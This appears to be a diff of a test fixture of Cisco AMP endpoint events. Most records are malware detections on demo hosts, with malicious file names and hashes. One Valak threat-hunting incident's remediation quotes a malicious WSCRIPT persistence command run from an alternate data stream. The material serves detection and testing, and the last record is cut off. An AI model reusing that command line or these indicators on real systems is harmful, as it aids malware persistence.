Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting 
Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n - Review all activity performed by the user\r\n - Upload any suspicious files to ThreatGrid for analysis\r\n - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
